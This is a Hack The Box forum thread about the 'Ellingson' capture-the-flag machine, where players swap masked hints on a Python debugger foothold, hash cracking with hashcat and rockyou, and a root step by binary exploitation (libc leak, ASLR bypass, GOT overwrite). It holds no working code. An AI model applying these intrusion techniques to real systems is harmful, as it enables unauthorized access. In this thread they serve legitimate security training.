Ellingson

Spoiler Removed

rooted &&

Type your comment> @sazouki said:

Type your comment> @maxo13 said:

One more question, as someone mentioned before:

How many hashes out of 4 are we expected to crack?
I cracked two (one with password that didnt work and second that worked) and gained access to user m***, what about other hashes?

//Edit: that 1 more password is enough. So you need to crack 2 where 1 should be quite strong password.

is those hashes related to fa2b ? because that’s the only 4 hashes i found

I have the same question, can anyone give me a little PM?

Could anyone please nudge me (pm is ok too ofc) with the initial step? I found the traceback and I’m fairly familiar with the web backend used but I can’t seem to make anything out of it at all (SSTI doesn’t work)

Type your comment> @rowra said:

Could anyone please nudge me (pm is ok too ofc) with the initial step? I found the traceback and I’m fairly familiar with the web backend used but I can’t seem to make anything out of it at all (SSTI doesn’t work)

Got in as h** but cannot proceed. Found some backups but they’re useless I guess. Nudge if possible please

Got user, onto binary exp. as a total noob, following/learning from ippsec vid. I try to recvuntil pa****** but it doesn’t work, just hangs there (not receiving anything). I believe it’s because (opposing bitterman from ippsec) the control given/input read is from the same line, no retline at the end/just before input. I cannot seem to parameterize it the proper way. Any help please?

Finally, rooted.

The EOF error has made me wanna cry :slight_smile: A big thank you goes to AzAxIaL and rowra for assistance with the final step. You guys rock

How is it possible that my exploit worked locally once and now it doesn’t?I have disabled A*** too. New to binex btw.Would appreciate any kind of nudge

Edit: Rooted!!! What an amazing box,was working on it for 2 weeks and I’ve learned a ton about Binex.Huge thanks to @adelmatrash for the nudges.

Rooted, but I’ve only gotten the shell after trying another method of attack, and I would love to know if someone knows why my first attempt didn’t work.

1st attempt: l----d puts a-----s, calculated the l–c o----t to bypass a–r (I didn’t forget to make the same calculation on the remote too), then called s----d and s----m with /—/–

although this worked locally it failed on the remote and gave segfaults

2nd attempt: nearly the same but instead of calling the functions directly I’ve o—w------ the G-- and used defined P–s, this one worked and I’ve gotten the root shell.

Can someone explain me why my first attempt failed? There is no reason that I can think of that it should fail?

Also, did anyone manage to get root without l-----g l–c? By only using the P-- functions, or maybe the un–ed_f–c part of the binary?

Thanks!

This was an awesome box. I got user a few weeks ago and then circled back after boning up on binary exploitation specific to ellingson’s architecture. I had a lot of fun and found this to be far easier than calamity or jail. Looking for more binary exploitation. If anyone can recommend another box on HTB, I would be much obliged.

Type your comment> @x0xxin said:

This was an awesome box. I got user a few weeks ago and then circled back after boning up on binary exploitation specific to ellingson’s architecture. I had a lot of fun and found this to be far easier than calamity or jail. Looking for more binary exploitation. If anyone can recommend another box on HTB, I would be much obliged.

Safe’s inital step / user is somewhat similar

Nice machine. :slight_smile:

Hint.
User: Be patient when cracking the hash, let the program that you choosed finish the wordlist.
Root: I lost a time to solve that EOF thing. My mistake was with recv() in that python library, I was getting a malformed leaked address, nothing that an debug has not solve.

I seem unable to crack the hash. I used hashcat with rockyou and exhausted the entire list. I did crack t*******e’s hash but that seems useless for now.

Type your comment> @CWright017 said:

I seem unable to crack the hash. I used hashcat with rockyou and exhausted the entire list. I did crack t*******e’s hash but that seems useless for now.

Read all pages correctly…you will get the hint for custom password list

Where is everyone finding this password policy? Is it on the website or inside the shell somewhere?

Apologies to all. Looks like I gave away too much last time, so let me try again with less spoilers.

INITIAL FOOTHOLD

  • So many articles. I wonder how many there are?
  • A snake’s REPLy will give you the chance to give your own key.

USER

  • Information kept for emergency recovery will help you not to be afraid of your own s****w
  • Some people still did not follow the Plague’s important memo on passwords!

ROOT

  • A clear reference to the movie. Like Crash Override, keep a copy of the disk.
  • IPPSEC’s bitterman vid is a great starter.
  • Local and Remote will have differences.
  • What other calls can be used to execute commands?

Hopefully this is spoiler-free enough to not be taken down.

As always, PM me here, or on Discord if you need more hints.
Don’t forget to tell me your progress!

Ha. Root was fun. pwntools didn’t want to work with the local binary, so I went straight to remote…

PM if you need help with this. Helping others helps me learn.

Got User :slight_smile:
thanks @AzAxIaL for nudging me to follow the path and guide on questions & to ensure to read all and really look at that what is there. I was kinda blind. in the end, quite straight fwd to user, basic commands needed etc pp.
Spend a long time on the initial connection, purely because of I missed the first piece of the required key… again a pebkac.
Next challenge root…

Somehow my john stops working after 2 seconds when trying with rockyou.txt as the wordlist. Anyone has an idea what the problem is?

Type your comment> @Chr0x6eOs said:

Somehow my john stops working after 2 seconds when trying with rockyou.txt as the wordlist. Anyone has an idea what the problem is?

I used hashcat